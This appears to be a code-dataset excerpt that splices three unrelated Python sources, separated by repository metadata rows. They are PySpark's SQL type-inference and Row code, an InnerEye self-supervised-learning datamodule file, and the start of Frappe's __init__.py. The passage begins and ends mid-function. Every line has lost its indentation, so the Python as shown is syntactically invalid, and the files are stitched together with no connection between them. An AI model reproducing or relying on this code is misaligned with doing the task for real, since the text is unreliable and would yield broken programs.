vt = _parse_datatype_string(parts[1])
return MapType(kt, vt)
elif s.startswith("struct<"):
if s[-1] != ">":
raise ValueError("'>' should be the last char, but got: %s" % s)
return _parse_struct_fields_string(s[7:-1])
elif ":" in s:
return _parse_struct_fields_string(s)
else:
return _parse_basic_datatype_string(s)
def _parse_datatype_json_string(json_string):
"""Parses the given data type JSON string.
>>> import pickle
>>> def check_datatype(datatype):
... pickled = pickle.loads(pickle.dumps(datatype))
... assert datatype == pickled
... scala_datatype = spark._jsparkSession.parseDataType(datatype.json())
... python_datatype = _parse_datatype_json_string(scala_datatype.json())
... assert datatype == python_datatype
>>> for cls in _all_atomic_types.values():
... check_datatype(cls())
>>> # Simple ArrayType.
>>> simple_arraytype = ArrayType(StringType(), True)
>>> check_datatype(simple_arraytype)
>>> # Simple MapType.
>>> simple_maptype = MapType(StringType(), LongType())
>>> check_datatype(simple_maptype)
>>> # Simple StructType.
>>> simple_structtype = StructType([
... StructField("a", DecimalType(), False),
... StructField("b", BooleanType(), True),
... StructField("c", LongType(), True),
... StructField("d", BinaryType(), False)])
>>> check_datatype(simple_structtype)
>>> # Complex StructType.
>>> complex_structtype = StructType([
... StructField("simpleArray", simple_arraytype, True),
... StructField("simpleMap", simple_maptype, True),
... StructField("simpleStruct", simple_structtype, True),
... StructField("boolean", BooleanType(), False),
... StructField("withMeta", DoubleType(), False, {"name": "age"})])
>>> check_datatype(complex_structtype)
>>> # Complex ArrayType.
>>> complex_arraytype = ArrayType(complex_structtype, True)
>>> check_datatype(complex_arraytype)
>>> # Complex MapType.
>>> complex_maptype = MapType(complex_structtype,
... complex_arraytype, False)
>>> check_datatype(complex_maptype)
"""
return _parse_datatype_json_value(json.loads(json_string))
def _parse_datatype_json_value(json_value):
if not isinstance(json_value, dict):
if json_value in _all_atomic_types.keys():
return _all_atomic_types[json_value]()
elif json_value == 'decimal':
return DecimalType()
elif _FIXED_DECIMAL.match(json_value):
m = _FIXED_DECIMAL.match(json_value)
return DecimalType(int(m.group(1)), int(m.group(2)))
else:
raise ValueError("Could not parse datatype: %s" % json_value)
else:
tpe = json_value["type"]
if tpe in _all_complex_types:
return _all_complex_types[tpe].fromJson(json_value)
elif tpe == 'udt':
return UserDefinedType.fromJson(json_value)
else:
raise ValueError("not supported type: %s" % tpe)
# Mapping Python types to Spark SQL DataType
_type_mappings = {
type(None): NullType,
bool: BooleanType,
int: LongType,
float: DoubleType,
str: StringType,
bytearray: BinaryType,
decimal.Decimal: DecimalType,
datetime.date: DateType,
datetime.datetime: TimestampType,
datetime.time: TimestampType,
}
if sys.version < "3":
_type_mappings.update({
unicode: StringType,
long: LongType,
})
def _infer_type(obj):
"""Infer the DataType from obj
"""
if obj is None:
return NullType()
if hasattr(obj, '__UDT__'):
return obj.__UDT__
dataType = _type_mappings.get(type(obj))
if dataType is DecimalType:
# the precision and scale of `obj` may be different from row to row.
return DecimalType(38, 18)
elif dataType is not None:
return dataType()
if isinstance(obj, dict):
for key, value in obj.items():
if key is not None and value is not None:
return MapType(_infer_type(key), _infer_type(value), True)
else:
return MapType(NullType(), NullType(), True)
elif isinstance(obj, (list, array)):
for v in obj:
if v is not None:
return ArrayType(_infer_type(obj[0]), True)
else:
return ArrayType(NullType(), True)
else:
try:
return _infer_schema(obj)
except TypeError:
raise TypeError("not supported type: %s" % type(obj))
def _infer_schema(row):
"""Infer the schema from dict/namedtuple/object"""
if isinstance(row, dict):
items = sorted(row.items())
elif isinstance(row, (tuple, list)):
if hasattr(row, "__fields__"): # Row
items = zip(row.__fields__, tuple(row))
elif hasattr(row, "_fields"): # namedtuple
items = zip(row._fields, tuple(row))
else:
names = ['_%d' % i for i in range(1, len(row) + 1)]
items = zip(names, row)
elif hasattr(row, "__dict__"): # object
items = sorted(row.__dict__.items())
else:
raise TypeError("Can not infer schema for type: %s" % type(row))
fields = [StructField(k, _infer_type(v), True) for k, v in items]
return StructType(fields)
def _has_nulltype(dt):
""" Return whether there is NullType in `dt` or not """
if isinstance(dt, StructType):
return any(_has_nulltype(f.dataType) for f in dt.fields)
elif isinstance(dt, ArrayType):
return _has_nulltype((dt.elementType))
elif isinstance(dt, MapType):
return _has_nulltype(dt.keyType) or _has_nulltype(dt.valueType)
else:
return isinstance(dt, NullType)
def _merge_type(a, b):
if isinstance(a, NullType):
return b
elif isinstance(b, NullType):
return a
elif type(a) is not type(b):
# TODO: type cast (such as int -> long)
raise TypeError("Can not merge type %s and %s" % (type(a), type(b)))
# same type
if isinstance(a, StructType):
nfs = dict((f.name, f.dataType) for f in b.fields)
fields = [StructField(f.name, _merge_type(f.dataType, nfs.get(f.name, NullType())))
for f in a.fields]
names = set([f.name for f in fields])
for n in nfs:
if n not in names:
fields.append(StructField(n, nfs[n]))
return StructType(fields)
elif isinstance(a, ArrayType):
return ArrayType(_merge_type(a.elementType, b.elementType), True)
elif isinstance(a, MapType):
return MapType(_merge_type(a.keyType, b.keyType),
_merge_type(a.valueType, b.valueType),
True)
else:
return a
def _need_converter(dataType):
if isinstance(dataType, StructType):
return True
elif isinstance(dataType, ArrayType):
return _need_converter(dataType.elementType)
elif isinstance(dataType, MapType):
return _need_converter(dataType.keyType) or _need_converter(dataType.valueType)
elif isinstance(dataType, NullType):
return True
else:
return False
def _create_converter(dataType):
"""Create a converter to drop the names of fields in obj """
if not _need_converter(dataType):
return lambda x: x
if isinstance(dataType, ArrayType):
conv = _create_converter(dataType.elementType)
return lambda row: [conv(v) for v in row]
elif isinstance(dataType, MapType):
kconv = _create_converter(dataType.keyType)
vconv = _create_converter(dataType.valueType)
return lambda row: dict((kconv(k), vconv(v)) for k, v in row.items())
elif isinstance(dataType, NullType):
return lambda x: None
elif not isinstance(dataType, StructType):
return lambda x: x
# dataType must be StructType
names = [f.name for f in dataType.fields]
converters = [_create_converter(f.dataType) for f in dataType.fields]
convert_fields = any(_need_converter(f.dataType) for f in dataType.fields)
def convert_struct(obj):
if obj is None:
return
if isinstance(obj, (tuple, list)):
if convert_fields:
return tuple(conv(v) for v, conv in zip(obj, converters))
else:
return tuple(obj)
if isinstance(obj, dict):
d = obj
elif hasattr(obj, "__dict__"): # object
d = obj.__dict__
else:
raise TypeError("Unexpected obj type: %s" % type(obj))
if convert_fields:
return tuple([conv(d.get(name)) for name, conv in zip(names, converters)])
else:
return tuple([d.get(name) for name in names])
return convert_struct
def _split_schema_abstract(s):
"""
split the schema abstract into fields
>>> _split_schema_abstract("a b c")
['a', 'b', 'c']
>>> _split_schema_abstract("a(a b)")
['a(a b)']
>>> _split_schema_abstract("a b[] c{a b}")
['a', 'b[]', 'c{a b}']
>>> _split_schema_abstract(" ")
[]
"""
r = []
w = ''
brackets = []
for c in s:
if c == ' ' and not brackets:
if w:
r.append(w)
w = ''
else:
w += c
if c in _BRACKETS:
brackets.append(c)
elif c in _BRACKETS.values():
if not brackets or c != _BRACKETS[brackets.pop()]:
raise ValueError("unexpected " + c)
if brackets:
raise ValueError("brackets not closed: %s" % brackets)
if w:
r.append(w)
return r
def _parse_field_abstract(s):
"""
Parse a field in schema abstract
>>> _parse_field_abstract("a")
StructField(a,NullType,true)
>>> _parse_field_abstract("b(c d)")
StructField(b,StructType(...c,NullType,true),StructField(d...
>>> _parse_field_abstract("a[]")
StructField(a,ArrayType(NullType,true),true)
>>> _parse_field_abstract("a{[]}")
StructField(a,MapType(NullType,ArrayType(NullType,true),true),true)
"""
if set(_BRACKETS.keys()) & set(s):
idx = min((s.index(c) for c in _BRACKETS if c in s))
name = s[:idx]
return StructField(name, _parse_schema_abstract(s[idx:]), True)
else:
return StructField(s, NullType(), True)
def _parse_schema_abstract(s):
"""
parse abstract into schema
>>> _parse_schema_abstract("a b c")
StructType...a...b...c...
>>> _parse_schema_abstract("a[b c] b{}")
StructType...a,ArrayType...b...c...b,MapType...
>>> _parse_schema_abstract("c{} d{a b}")
StructType...c,MapType...d,MapType...a...b...
>>> _parse_schema_abstract("a b(t)").fields[1]
StructField(b,StructType(List(StructField(t,NullType,true))),true)
"""
s = s.strip()
if not s:
return NullType()
elif s.startswith('('):
return _parse_schema_abstract(s[1:-1])
elif s.startswith('['):
return ArrayType(_parse_schema_abstract(s[1:-1]), True)
elif s.startswith('{'):
return MapType(NullType(), _parse_schema_abstract(s[1:-1]))
parts = _split_schema_abstract(s)
fields = [_parse_field_abstract(p) for p in parts]
return StructType(fields)
def _infer_schema_type(obj, dataType):
"""
Fill the dataType with types inferred from obj
>>> schema = _parse_schema_abstract("a b c d")
>>> row = (1, 1.0, "str", datetime.date(2014, 10, 10))
>>> _infer_schema_type(row, schema)
StructType...LongType...DoubleType...StringType...DateType...
>>> row = [[1], {"key": (1, 2.0)}]
>>> schema = _parse_schema_abstract("a[] b{c d}")
>>> _infer_schema_type(row, schema)
StructType...a,ArrayType...b,MapType(StringType,...c,LongType...
"""
if isinstance(dataType, NullType):
return _infer_type(obj)
if not obj:
return NullType()
if isinstance(dataType, ArrayType):
eType = _infer_schema_type(obj[0], dataType.elementType)
return ArrayType(eType, True)
elif isinstance(dataType, MapType):
k, v = next(iter(obj.items()))
return MapType(_infer_schema_type(k, dataType.keyType),
_infer_schema_type(v, dataType.valueType))
elif isinstance(dataType, StructType):
fs = dataType.fields
assert len(fs) == len(obj), \
"Obj(%s) have different length with fields(%s)" % (obj, fs)
fields = [StructField(f.name, _infer_schema_type(o, f.dataType), True)
for o, f in zip(obj, fs)]
return StructType(fields)
else:
raise TypeError("Unexpected dataType: %s" % type(dataType))
_acceptable_types = {
BooleanType: (bool,),
ByteType: (int, long),
ShortType: (int, long),
IntegerType: (int, long),
LongType: (int, long),
FloatType: (float,),
DoubleType: (float,),
DecimalType: (decimal.Decimal,),
StringType: (str, unicode),
BinaryType: (bytearray,),
DateType: (datetime.date, datetime.datetime),
TimestampType: (datetime.datetime,),
ArrayType: (list, tuple, array),
MapType: (dict,),
StructType: (tuple, list, dict),
}
def _verify_type(obj, dataType, nullable=True):
"""
Verify the type of obj against dataType, raise a TypeError if they do not match.
Also verify the value of obj against datatype, raise a ValueError if it's not within the allowed
range, e.g. using 128 as ByteType will overflow. Note that, Python float is not checked, so it
will become infinity when cast to Java float if it overflows.
>>> _verify_type(None, StructType([]))
>>> _verify_type("", StringType())
>>> _verify_type(0, LongType())
>>> _verify_type(list(range(3)), ArrayType(ShortType()))
>>> _verify_type(set(), ArrayType(StringType())) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
>>> _verify_type({}, MapType(StringType(), IntegerType()))
>>> _verify_type((), StructType([]))
>>> _verify_type([], StructType([]))
>>> _verify_type([1], StructType([])) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> # Check if numeric values are within the allowed range.
>>> _verify_type(12, ByteType())
>>> _verify_type(1234, ByteType()) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> _verify_type(None, ByteType(), False) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> _verify_type([1, None], ArrayType(ShortType(), False)) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> _verify_type({None: 1}, MapType(StringType(), IntegerType()))
Traceback (most recent call last):
...
ValueError:...
>>> schema = StructType().add("a", IntegerType()).add("b", StringType(), False)
>>> _verify_type((1, None), schema) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
if obj is None:
if nullable:
return
else:
raise ValueError("This field is not nullable, but got None")
# StringType can work with any types
if isinstance(dataType, StringType):
return
if isinstance(dataType, UserDefinedType):
if not (hasattr(obj, '__UDT__') and obj.__UDT__ == dataType):
raise ValueError("%r is not an instance of type %r" % (obj, dataType))
_verify_type(dataType.toInternal(obj), dataType.sqlType())
return
_type = type(dataType)
assert _type in _acceptable_types, "unknown datatype: %s for object %r" % (dataType, obj)
if _type is StructType:
# check the type and fields later
pass
else:
# subclass of them can not be fromInternal in JVM
if type(obj) not in _acceptable_types[_type]:
raise TypeError("%s can not accept object %r in type %s" % (dataType, obj, type(obj)))
if isinstance(dataType, ByteType):
if obj < -128 or obj > 127:
raise ValueError("object of ByteType out of range, got: %s" % obj)
elif isinstance(dataType, ShortType):
if obj < -32768 or obj > 32767:
raise ValueError("object of ShortType out of range, got: %s" % obj)
elif isinstance(dataType, IntegerType):
if obj < -2147483648 or obj > 2147483647:
raise ValueError("object of IntegerType out of range, got: %s" % obj)
elif isinstance(dataType, ArrayType):
for i in obj:
_verify_type(i, dataType.elementType, dataType.containsNull)
elif isinstance(dataType, MapType):
for k, v in obj.items():
_verify_type(k, dataType.keyType, False)
_verify_type(v, dataType.valueType, dataType.valueContainsNull)
elif isinstance(dataType, StructType):
if isinstance(obj, dict):
for f in dataType.fields:
_verify_type(obj.get(f.name), f.dataType, f.nullable)
elif isinstance(obj, Row) and getattr(obj, "__from_dict__", False):
# the order in obj could be different than dataType.fields
for f in dataType.fields:
_verify_type(obj[f.name], f.dataType, f.nullable)
elif isinstance(obj, (tuple, list)):
if len(obj) != len(dataType.fields):
raise ValueError("Length of object (%d) does not match with "
"length of fields (%d)" % (len(obj), len(dataType.fields)))
for v, f in zip(obj, dataType.fields):
_verify_type(v, f.dataType, f.nullable)
elif hasattr(obj, "__dict__"):
d = obj.__dict__
for f in dataType.fields:
_verify_type(d.get(f.name), f.dataType, f.nullable)
else:
raise TypeError("StructType can not accept object %r in type %s" % (obj, type(obj)))
# This is used to unpickle a Row from JVM
def _create_row_inbound_converter(dataType):
return lambda *a: dataType.fromInternal(a)
def _create_row(fields, values):
row = Row(*values)
row.__fields__ = fields
return row
class Row(tuple):
"""
A row in L{DataFrame}.
The fields in it can be accessed:
* like attributes (``row.key``)
* like dictionary values (``row[key]``)
``key in row`` will search through row keys.
Row can be used to create a row object by using named arguments,
the fields will be sorted by names.
>>> row = Row(name="Alice", age=11)
>>> row
Row(age=11, name='Alice')
>>> row['name'], row['age']
('Alice', 11)
>>> row.name, row.age
('Alice', 11)
>>> 'name' in row
True
>>> 'wrong_key' in row
False
Row also can be used to create another Row like class, then it
could be used to create Row objects, such as
>>> Person = Row("name", "age")
>>> Person
<Row(name, age)>
>>> 'name' in Person
True
>>> 'wrong_key' in Person
False
>>> Person("Alice", 11)
Row(name='Alice', age=11)
"""
def __new__(self, *args, **kwargs):
if args and kwargs:
raise ValueError("Can not use both args "
"and kwargs to create Row")
if kwargs:
# create row objects
names = sorted(kwargs.keys())
row = tuple.__new__(self, [kwargs[n] for n in names])
row.__fields__ = names
row.__from_dict__ = True
return row
else:
# create row class or objects
return tuple.__new__(self, args)
def asDict(self, recursive=False):
"""
Return as an dict
:param recursive: turns the nested Row as dict (default: False).
>>> Row(name="Alice", age=11).asDict() == {'name': 'Alice', 'age': 11}
True
>>> row = Row(key=1, value=Row(name='a', age=2))
>>> row.asDict() == {'key': 1, 'value': Row(age=2, name='a')}
True
>>> row.asDict(True) == {'key': 1, 'value': {'name': 'a', 'age': 2}}
True
"""
if not hasattr(self, "__fields__"):
raise TypeError("Cannot convert a Row class into dict")
if recursive:
def conv(obj):
if isinstance(obj, Row):
return obj.asDict(True)
elif isinstance(obj, list):
return [conv(o) for o in obj]
elif isinstance(obj, dict):
return dict((k, conv(v)) for k, v in obj.items())
else:
return obj
return dict(zip(self.__fields__, (conv(o) for o in self)))
else:
return dict(zip(self.__fields__, self))
def __contains__(self, item):
if hasattr(self, "__fields__"):
return item in self.__fields__
else:
return super(Row, self).__contains__(item)
# let object acts like class
def __call__(self, *args):
"""create new Row object"""
return _create_row(self, args)
def __getitem__(self, item):
if isinstance(item, (int, slice)):
return super(Row, self).__getitem__(item)
try:
# it will be slow when it has many fields,
# but this will not be used in normal cases
idx = self.__fields__.index(item)
return super(Row, self).__getitem__(idx)
except IndexError:
raise KeyError(item)
except ValueError:
raise ValueError(item)
def __getattr__(self, item):
if item.startswith("__"):
raise AttributeError(item)
try:
# it will be slow when it has many fields,
# but this will not be used in normal cases
idx = self.__fields__.index(item)
return self[idx]
except IndexError:
raise AttributeError(item)
except ValueError:
raise AttributeError(item)
def __setattr__(self, key, value):
if key != '__fields__' and key != "__from_dict__":
raise Exception("Row is read-only")
self.__dict__[key] = value
def __reduce__(self):
"""Returns a tuple so Python knows how to pickle Row."""
if hasattr(self, "__fields__"):
return (_create_row, (self.__fields__, tuple(self)))
else:
return tuple.__reduce__(self)
def __repr__(self):
"""Printable representation of Row used in Python REPL."""
if hasattr(self, "__fields__"):
return "Row(%s)" % ", ".join("%s=%r" % (k, v)
for k, v in zip(self.__fields__, tuple(self)))
else:
return "<Row(%s)>" % ", ".join(self)
class DateConverter(object):
def can_convert(self, obj):
return isinstance(obj, datetime.date)
def convert(self, obj, gateway_client):
Date = JavaClass("java.sql.Date", gateway_client)
return Date.valueOf(obj.strftime("%Y-%m-%d"))
class DatetimeConverter(object):
def can_convert(self, obj):
return isinstance(obj, datetime.datetime)
def convert(self, obj, gateway_client):
Timestamp = JavaClass("java.sql.Timestamp", gateway_client)
seconds = (calendar.timegm(obj.utctimetuple()) if obj.tzinfo
else time.mktime(obj.timetuple()))
t = Timestamp(int(seconds) * 1000)
t.setNanos(obj.microsecond * 1000)
return t
# datetime is a subclass of date, we should register DatetimeConverter first
register_input_converter(DatetimeConverter())
register_input_converter(DateConverter())
def _test():
import doctest
from pyspark.context import SparkContext
from pyspark.sql import SparkSession
globs = globals()
sc = SparkContext('local[4]', 'PythonTest')
globs['sc'] = sc
globs['spark'] = SparkSession.builder.getOrCreate()
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
| 32.991066
| 100
| 0.601969
|
4a023203b1db83849a80d4503a77e6a191933bcf
| 8,032
|
py
|
Python
|
InnerEye/ML/SSL/datamodules_and_datasets/datamodules.py
|
microsoft/InnerEye-DeepLearning
|
6a4d334a996b69269d959d946e4d24a5ee2e9f55
|
[
"MIT"
] | 402
|
2020-09-22T16:38:16.000Z
|
2022-03-30T09:56:03.000Z
|
InnerEye/ML/SSL/datamodules_and_datasets/datamodules.py
|
wensincai/InnerEye-DeepLearning
|
ccb53d01ad0f1c20336588c0066059b8de5266fd
|
[
"MIT"
] | 259
|
2020-09-23T09:32:33.000Z
|
2022-03-30T18:15:01.000Z
|
InnerEye/ML/SSL/datamodules_and_datasets/datamodules.py
|
wensincai/InnerEye-DeepLearning
|
ccb53d01ad0f1c20336588c0066059b8de5266fd
|
[
"MIT"
] | 112
|
2020-09-23T00:12:58.000Z
|
2022-03-31T07:39:55.000Z
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
import os
from typing import Any, Callable, Dict, Optional, Union
import numpy as np
import torch
from pl_bolts.datamodules.vision_datamodule import VisionDataModule
from pytorch_lightning import LightningDataModule
from pytorch_lightning.trainer.supporters import CombinedLoader
from torch.utils.data import DataLoader, Dataset
from InnerEye.ML.SSL.utils import SSLDataModuleType
class InnerEyeVisionDataModule(VisionDataModule):
def __init__(self,
dataset_cls: type,
return_index: bool,
train_transforms: Optional[Callable],
val_transforms: Optional[Callable],
data_dir: Optional[str] = None,
val_split: Union[int, float] = 0.2,
num_workers: int = 6,
batch_size: int = 32,
seed: int = 42,
drop_last: bool = True,
*args: Any, **kwargs: Any) -> None:
"""
Wrapper around VisionDatamodule to load torchvision dataset into a pytorch-lightning module.
:param dataset_cls: class to load the dataset. Expected to inherit from InnerEyeDataClassBaseWithReturnIndex and
VisionDataset. See InnerEyeCIFAR10 for an example.
BEWARE VisionDataModule expects the first positional argument of your class to be the data directory.
:param return_index: whether the return the index in __get_item__, the dataset_cls is expected to implement
this logic.
:param train_transforms: transforms to use at training time
:param val_transforms: transforms to use at validation time
:param data_dir: data directory where to find the data
:param val_split: proportion of training dataset to use for validation
:param num_workers: number of processes for dataloaders
:param batch_size: batch size for training & validation
:param seed: random seed for dataset splitting
:param drop_last: bool, if true it drops the last incomplete batch
"""
data_dir = data_dir if data_dir is not None else os.getcwd()
super().__init__(data_dir=data_dir,
val_split=val_split,
num_workers=num_workers,
batch_size=batch_size,
drop_last=drop_last,
train_transforms=train_transforms,
val_transforms=val_transforms,
seed=seed,
*args,
**kwargs)
self.dataset_cls = dataset_cls
self.class_weights: Optional[torch.Tensor] = None
# In setup() VisionDataModule expects the extra arguments to be passed to the dataset class init
# via the self.EXTRA_ARGS attribute
self.EXTRA_ARGS = {"return_index": return_index}
def prepare_data(self) -> None:
"""
Initializes the dataset class, and in the case of CIFAR dataset, optionally downloads the data from URL to
local data_dir.
"""
self.dataset_cls(self.data_dir, train=True, download=True, **self.EXTRA_ARGS)
self.dataset_cls(self.data_dir, train=False, download=True, **self.EXTRA_ARGS)
def _split_dataset(self, dataset: Dataset, train: bool = True) -> Dataset:
"""
Splits the dataset into train and validation set
"""
if hasattr(dataset, "_split_dataset"):
# If the dataset implements a more complex logic than just splitting randomly by index.
# The dataset class can implements its own _split_dataset function.
dataset_train, dataset_val = dataset._split_dataset(val_split=self.val_split, # type: ignore
seed=self.seed)
return dataset_train if train else dataset_val
else:
return super()._split_dataset(dataset, train)
def compute_class_weights(self) -> Optional[torch.Tensor]:
dataset = self.dataset_train.dataset
class_weights = None
if hasattr(dataset, "targets"):
class_weights = len(dataset.targets) / np.bincount(dataset.targets)
# Normalized class weights
class_weights /= class_weights.sum()
class_weights = torch.tensor(class_weights, dtype=torch.float32)
return class_weights
class CombinedDataModule(LightningDataModule):
def __init__(self,
encoder_module: InnerEyeVisionDataModule,
linear_head_module: InnerEyeVisionDataModule,
use_balanced_loss_linear_head: bool,
*args: Any,
**kwargs: Any) -> None:
"""
Combined data module to use different datamodules for training SSL encoder and finetuning the linear head.
Each batch returned by this data module, will be a dictionary of type Dict[SSLDataModuleType, Any]. If one
dataloader is shorter than the other, combined dataloader will start looping again from the start of the shorter
one until we looped through the longest one.
:param encoder_module: datamodule to use for training of SSL.
:param linear_head_module: datamodule to use for training of linear head on top of frozen encoder. Can use a
different batch size than the encoder module. CombinedDataModule logic will take care of aggregation.
"""
super().__init__(*args, **kwargs)
self.encoder_module = encoder_module
self.linear_head_module = linear_head_module
self.class_weights = None
if use_balanced_loss_linear_head:
self.class_weights = self.linear_head_module.compute_class_weights()
self.batch_size = self.encoder_module.batch_size
def prepare_data(self, *args: Any, **kwargs: Any) -> None:
"""
Saves files to data_dir
"""
self.encoder_module.prepare_data()
self.linear_head_module.prepare_data()
logging.info(f"Len encoder train dataloader {len(self.encoder_module.train_dataloader())}")
logging.info(f"Len total train dataloader {len(self.train_dataloader())}")
def train_dataloader(self, *args: Any, **kwargs: Any) -> Dict[SSLDataModuleType, DataLoader]: # type: ignore
"""
The train dataloaders
"""
# This code may be superseded in current versions of PL. Using this dictionary syntax will effectively
# use a CombinedLoader(dataloaders, mode="max_size_cycle"), similar to what we need to do explicitly for
# the validation data loader.
dataloaders = {
SSLDataModuleType.ENCODER: self.encoder_module.train_dataloader(),
SSLDataModuleType.LINEAR_HEAD: self.linear_head_module.train_dataloader()}
return dataloaders
def val_dataloader(self, *args: Any, **kwargs: Any) -> CombinedLoader: # type: ignore
"""
The val dataloader
"""
dataloaders = {
SSLDataModuleType.ENCODER: self.encoder_module.val_dataloader(),
SSLDataModuleType.LINEAR_HEAD: self.linear_head_module.val_dataloader()}
return CombinedLoader(dataloaders, mode="max_size_cycle")
@property
def num_samples(self) -> int:
"""
Returns number of samples in training set
"""
return len(self.encoder_module.dataset_train)
@property
def num_classes(self) -> int:
return self.linear_head_module.dataset_train.dataset.num_classes
def setup(self, stage: Optional[str] = None) -> None:
self.encoder_module.setup(stage)
self.linear_head_module.setup(stage)
| 46.97076
| 120
| 0.641185
|
4a0232e62453fbabfdf00a3185500c872579341c
| 28,282
|
py
|
Python
|
frappe/__init__.py
|
gangadharkadam/letzfrappe
|
51a2108acddd5ae9c5a58238a2097476a3de1775
|
[
"MIT"
] | null | null | null |
frappe/__init__.py
|
gangadharkadam/letzfrappe
|
51a2108acddd5ae9c5a58238a2097476a3de1775
|
[
"MIT"
] | null | null | null |
frappe/__init__.py
|
gangadharkadam/letzfrappe
|
51a2108acddd5ae9c5a58238a2097476a3de1775
|
[
"MIT"
] | 1
|
2018-03-22T00:24:53.000Z
|
2018-03-22T00:24:53.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
"""
globals attached to frappe module
+ some utility functions that should probably be moved
"""
from __future__ import unicode_literals
from werkzeug.local import Local, release_local
import os, importlib, inspect, logging, json
# public
from frappe.__version__ import __version__
from .exceptions import *
from .utils.jinja import get_jenv, get_template, render_template
local = Local()
class _dict(dict):
"""dict like object that exposes keys as attributes"""
def __getattr__(self, key):
ret = self.get(key)
if not ret and key.startswith("__"):
raise AttributeError()
return ret
def __setattr__(self, key, value):
self[key] = value
def __getstate__(self):
return self
def __setstate__(self, d):
self.update(d)
def update(self, d):
"""update and return self -- the missing dict feature in python"""
super(_dict, self).update(d)
return self
def copy(self):
return _dict(dict(self).copy())
def _(msg):
"""Returns translated string in current lang, if exists."""
if local.lang == "en":
return msg
from frappe.translate import get_full_dict
return get_full_dict(local.lang).get(msg, msg)
def get_lang_dict(fortype, name=None):
"""Returns the translated language dict for the given type and name.
:param fortype: must be one of `doctype`, `page`, `report`, `include`, `jsfile`, `boot`
:param name: name of the document for which assets are to be returned."""
if local.lang=="en":
return {}
from frappe.translate import get_dict
return get_dict(fortype, name)
def set_user_lang(user, user_language=None):
"""Guess and set user language for the session. `frappe.local.lang`"""
from frappe.translate import get_user_lang
local.lang = get_user_lang(user)
# local-globals
db = local("db")
conf = local("conf")
form = form_dict = local("form_dict")
request = local("request")
request_method = local("request_method")
response = local("response")
session = local("session")
user = local("user")
flags = local("flags")
error_log = local("error_log")
debug_log = local("debug_log")
message_log = local("message_log")
lang = local("lang")
def init(site, sites_path=None):
"""Initialize frappe for the current site. Reset thread locals `frappe.local`"""
if getattr(local, "initialised", None):
return
if not sites_path:
sites_path = '.'
local.error_log = []
local.message_log = []
local.debug_log = []
local.flags = _dict({})
local.rollback_observers = []
local.test_objects = {}
local.site = site
local.sites_path = sites_path
local.site_path = os.path.join(sites_path, site)
local.request_method = request.method if request else None
local.request_ip = None
local.response = _dict({"docs":[]})
local.conf = _dict(get_site_config())
local.lang = local.conf.lang or "en"
local.module_app = None
local.app_modules = None
local.user = None
local.role_permissions = {}
local.jenv = None
local.jloader =None
local.cache = {}
setup_module_map()
local.initialised = True
def connect(site=None, db_name=None):
"""Connect to site database instance.
:param site: If site is given, calls `frappe.init`.
:param db_name: Optional. Will use from `site_config.json`."""
from database import Database
if site:
init(site)
local.db = Database(user=db_name or local.conf.db_name)
local.form_dict = _dict()
local.session = _dict()
set_user("Administrator")
def get_site_config(sites_path=None, site_path=None):
"""Returns `site_config.json` combined with `sites/common_site_config.json`.
`site_config` is a set of site wide settings like database name, password, email etc."""
config = {}
sites_path = sites_path or getattr(local, "sites_path", None)
site_path = site_path or getattr(local, "site_path", None)
if sites_path:
common_site_config = os.path.join(sites_path, "common_site_config.json")
if os.path.exists(common_site_config):
config.update(get_file_json(common_site_config))
if site_path:
site_config = os.path.join(site_path, "site_config.json")
if os.path.exists(site_config):
config.update(get_file_json(site_config))
return _dict(config)
def destroy():
"""Closes connection and releases werkzeug local."""
if db:
db.close()
release_local(local)
# memcache
redis_server = None
def cache():
"""Returns memcache connection."""
global redis_server
if not redis_server:
from frappe.utils.redis_wrapper import RedisWrapper
redis_server = RedisWrapper(conf.get("redis_server") or "localhost")
return redis_server
def get_traceback():
"""Returns error traceback."""
import utils
return utils.get_traceback()
def errprint(msg):
"""Log error. This is sent back as `exc` in response.
:param msg: Message."""
from utils import cstr
if not request or (not "cmd" in local.form_dict):
print cstr(msg)
error_log.append(cstr(msg))
def log(msg):
"""Add to `debug_log`.
:param msg: Message."""
if not request:
if conf.get("logging") or False:
print repr(msg)
from utils import cstr
debug_log.append(cstr(msg))
def msgprint(msg, small=0, raise_exception=0, as_table=False):
"""Print a message to the user (via HTTP response).
Messages are sent in the `__server_messages` property in the
response JSON and shown in a pop-up / modal.
:param msg: Message.
:param small: [optional] Show as a floating message in the footer.
:param raise_exception: [optional] Raise given exception and show message.
:param as_table: [optional] If `msg` is a list of lists, render as HTML table.
"""
def _raise_exception():
if raise_exception:
if flags.rollback_on_exception:
db.rollback()
import inspect
if inspect.isclass(raise_exception) and issubclass(raise_exception, Exception):
raise raise_exception, msg
else:
raise ValidationError, msg
if flags.mute_messages:
_raise_exception()
return
from utils import cstr
if as_table and type(msg) in (list, tuple):
msg = '<table border="1px" style="border-collapse: collapse" cellpadding="2px">' + ''.join(['<tr>'+''.join(['<td>%s</td>' % c for c in r])+'</tr>' for r in msg]) + '</table>'
if flags.print_messages:
print "Message: " + repr(msg)
message_log.append((small and '__small:' or '')+cstr(msg or ''))
_raise_exception()
def throw(msg, exc=ValidationError):
"""Throw execption and show message (`msgprint`).
:param msg: Message.
:param exc: Exception class. Default `frappe.ValidationError`"""
msgprint(msg, raise_exception=exc)
def create_folder(path, with_init=False):
"""Create a folder in the given path and add an `__init__.py` file (optional).
:param path: Folder path.
:param with_init: Create `__init__.py` in the new folder."""
from frappe.utils import touch_file
if not os.path.exists(path):
os.makedirs(path)
if with_init:
touch_file(os.path.join(path, "__init__.py"))
def set_user(username):
"""Set current user.
:param username: **User** name to set as current user."""
from frappe.utils.user import User
local.session.user = username
local.session.sid = username
local.cache = {}
